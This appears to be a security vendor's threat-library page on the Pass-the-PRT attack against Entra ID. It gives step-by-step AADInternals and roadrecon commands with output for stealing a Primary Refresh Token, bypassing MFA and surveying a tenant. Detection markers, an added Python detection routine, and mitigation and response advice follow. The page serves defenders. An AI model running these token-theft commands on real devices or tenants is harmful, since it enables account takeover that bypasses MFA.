Pass the Primary Refresh Token (PRT) Attack


Primary Refresh Tokens (PRTs) are crucial components in modern authentication, particularly in Microsoft Entra ID environments. A PRT is issued when a user logs into a Windows 10 or newer device that is registered to their Entra ID tenant. Once issued, the PRT is securely stored on the device it was issued to and can be used to seamlessly authenticate to cloud resources for a lengthy period (14-90 days depending on usage).

Adversaries can use a technique called Pass-the-PRT to steal a Primary Refresh Token from a device and subsequently use it to authenticate as the victim to cloud resources. This method of authentication effectively bypasses Multi-Factor Authentication and circumvents security controls, allowing the adversary access to the requested resources.

Threat Summary

Target: Entra ID (formerly Azure AD)
Tools: ROADTools, Mimikatz, AADInternals
ATT&CK® Tactic:
ATT&CK Technique: T1003

Difficulty
Detection: Medium
Mitigation: Hard
Response: Hard

Attack Tutorial: How a Pass the Primary Refresh Token (PRT) Attack Works

STEP 1

Extracts the User's Primary Refresh Token

The adversary requires code execution on the device, as either an administrator or a standard user, to attempt PRT extraction. In this case the adversary is not an administrator, so they use the AADInternals PowerShell module, which simplifies obtaining the victim's PRT.

The AADInternals Get-AADIntUserPRTToken cmdlet defaults to using the BrowserCore executable to extract the PRT from the x-ms-RefreshTokenCredential cookie. However, there are options other than BrowserCore.exe, such as interfacing directly with the underlying COM objects in MicrosoftAccountTokenProvider.dll, or the mimikatz sekurlsa module, which can extract the PRT once it has been loaded into LSASS.

Code

Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Confirm:$False
Install-Module AADInternals -Scope CurrentUser -Force -Confirm:$False
Import-Module AADInternals
$PRT = Get-AADIntUserPRTToken
$PRT

Output

    ___    ___    ____  ____      __                        __
   /   |  /   |  / __ \/  _/___  / /____  _________  ____ _/ /____
  / /| | / /| | / / / // // __ \/ __/ _ \/ ___/ __ \/ __ `/ / ___/
 / ___ |/ ___ |/ /_/ _/ // / / / /_/  __/ /  / / / / /_/ / (__  )
/_/  |_/_/  |_/_____/___/_/ /_/\__/\___/_/  /_/ /_/\__,_/_/____/

 v0.9.4 by @DrAzureAD (Nestori Syynimaa)

eyJhbGciOiJIUzI1NiIsICJrZGZfdmVyIjoyLCAiY3R4IjoiXC9IdmJKUVNhZFF<output_truncated>uZG93cyIsICJyZXF1ZXN0X25 vbmNlIjoiQXdBQkVnRUFBQUFEQU96X0JRRDBfNUVpNU8tY20yRzdiNEVyZ242SzU3Y2xDQThLYXBiLUU1M3hJZ0FpYkFu M09EbHRiMHAtYjZFTUpZbGJ6MDBXUU8tZVloLWp3MVNFekpieWp3ZHJNbDhnQUEifQ.ykZ4Zc0trLmvDGtSCYv3_SPhRH jGfB_IVYHo0zvLBSQ

STEP 2

Authenticates using the PRT

The adversary can now use the Primary Refresh Token to authenticate as the victim user and gain access to different resources. Because authentication is performed with the PRT, certain security mechanisms such as MFA are bypassed.

In this case the adversary uses the PRT to request a token for the Graph API.

Code

$JWT = Get-AADIntAccessTokenForAADGraph -PRTToken $PRT -SaveToCache
$JWT

# Testing access works
Get-AADIntUsers | Select-Object UserPrincipalName -First 1

Output

AccessToken saved to cache

Tenant                               User                      Resource                  Client
------                               ----                      --------                  ------
ea2105c0-712b-48d2-93e2-3cd52d0ba327 CUser1@stealthbitslab.com https://graph.windows.net 1b730954-1685-4b74-9bfd-dac...

UserPrincipalName
-----------------
Deborah@stealthbitslab.com

STEP 3

Further objectives

Now that the adversary is authenticated as the victim's account, they are going to perform reconnaissance on the victim's Entra ID tenant.

In this case reconnaissance will be performed using roadrecon to automate the collection and analysis of data to help users

Code

# To get the JWT from the cache you can use the Get-AADIntAccessTokenFromCache command.
roadrecon auth --access-token "<Enter JWT>"
roadrecon gather

Output

Tokens were written to .roadtools_auth

Starting data gathering phase 1 of 2 (collecting objects)
Starting data gathering phase 2 of 2 (collecting properties and relationships)
ROADrecon gather executed in 13.22 seconds and issued 2382 HTTP requests.

Detect, Mitigate and Respond

Detect

Difficulty: Medium

Detection of Pass-the-PRT is a challenge because the attack can be conducted in a number of different ways, each of which leaves its own indicators.

Capturing the extraction of PRT-related information across endpoints is a critical first step and will usually be done with an EDR solution. Here are some specific items that relate to PRT extraction:

  • Process creation for BrowserCore.exe where the creator process is non-standard, such as PowerShell.
  • Any and all access into LSASS.exe should be monitored
    • Windows Defender Attack Surface Reduction rules can specifically detect credential stealing from LSASS.
  • Exporting the device certificate and device transport key from a device
  • Monitor for known tools and specific command line options such as:
    • Get-AADIntUserPRTToken
    • Mimikatz.exe
    • sekurlsa::cloudap

Further detection options include using the cloud sign-in and audit logs to perform User and Entity Behavior Analytics (UEBA) to catch things such as authentication from unfamiliar locations, unusual sign-in properties and suspicious behavior in the tenant.
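As an added example (not part of the original page or of any vendor product), the endpoint markers listed above turned into a small detection routine. It assumes Sysmon-style events (Event ID 1 process creation and Event ID 10 process access) as dictionaries, and the parent and accessor allowlists are assumptions that need tuning per environment; the sample events are constructed.

```python
# Added example: apply the PRT-extraction markers from the text to endpoint events.
# Event shapes are assumed Sysmon-style: EID 1 (process create), EID 10 (process access).

# Command-line indicators named in the text; matched case-insensitively
CMDLINE_INDICATORS = ("get-aadintuserprttoken", "mimikatz.exe", "sekurlsa::cloudap")

# Parents expected to launch BrowserCore.exe (browser native-messaging hosts).
# Assumed allowlist: anything else, e.g. powershell.exe, is a non-standard creator.
BROWSERCORE_EXPECTED_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe"}

# Processes that routinely open LSASS. Assumed allowlist; tune per environment.
LSASS_EXPECTED_ACCESSORS = {"msmpeng.exe", "csrss.exe", "wininit.exe", "services.exe"}


def _basename(path):
    """Lower-cased file name of a Windows path (handles either separator)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of detection names that one event triggers (empty if none)."""
    hits = []
    if event.get("EventID") == 1:
        image = _basename(event.get("Image", ""))
        parent = _basename(event.get("ParentImage", ""))
        cmdline = event.get("CommandLine", "").lower()
        if image == "browsercore.exe" and parent not in BROWSERCORE_EXPECTED_PARENTS:
            hits.append("browsercore_nonstandard_parent")
        if any(ind in cmdline for ind in CMDLINE_INDICATORS):
            hits.append("prt_tool_commandline")
    elif event.get("EventID") == 10:
        if (_basename(event.get("TargetImage", "")) == "lsass.exe"
                and _basename(event.get("SourceImage", "")) not in LSASS_EXPECTED_ACCESSORS):
            hits.append("lsass_access_unexpected_source")
    return hits


def scan(events):
    """Run classify over a batch and return (RecordId, detection) pairs for alerting."""
    return [(e["RecordId"], h) for e in events for h in classify(e)]


# Constructed sample events (paths are illustrative, not captured from a real host)
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 1, "Image": r"C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "CommandLine": "BrowserCore.exe"},
    {"RecordId": 2, "EventID": 1, "Image": r"C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "CommandLine": "BrowserCore.exe"},
    {"RecordId": 3, "EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": 'powershell.exe -c "$PRT = Get-AADIntUserPRTToken"'},
    {"RecordId": 4, "EventID": 10, "SourceImage": r"C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe"},
    {"RecordId": 5, "EventID": 10, "SourceImage": r"C:\Users\Public\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe"},
]
```

Running `scan(SAMPLE_EVENTS)` flags records 2, 3 and 5 while the legitimate browser launch and the Defender LSASS access pass silently; expect to grow both allowlists from a baseline of your own fleet before alerting on them.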

Mitigate

Difficulty: Hard

Organizations looking to mitigate Pass-the-PRT should focus on:

  • Reducing the number of users with administrator access to their devices
  • Using built-in security features such as:
    • Attack Surface Reduction rules to block credential stealing from LSASS
    • Tamper protection to ensure security settings are kept as configured.
  • Ensuring endpoints that are cloud-connected have basic security measures such as:
    • An EDR/AV solution installed and configured
    • Tamper protection measures enabled
    • Updates applied in a timely manner

Respond

Difficulty: Hard

When Pass-the-PRT is detected, defenders need to take a two-pronged approach in response: first, contain the compromised account; second, carry out a manual investigation to understand what activities the account performed while compromised and whether further remediation is needed.

Here are some automated response steps that can be taken:

  • Activate the incident response process and alert the response team
  • Isolate the endpoint that suspicious activity was detected on
  • Revoke the compromised user's sign-in sessions
  • Mark the account as "confirmed compromised" in Entra ID


MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.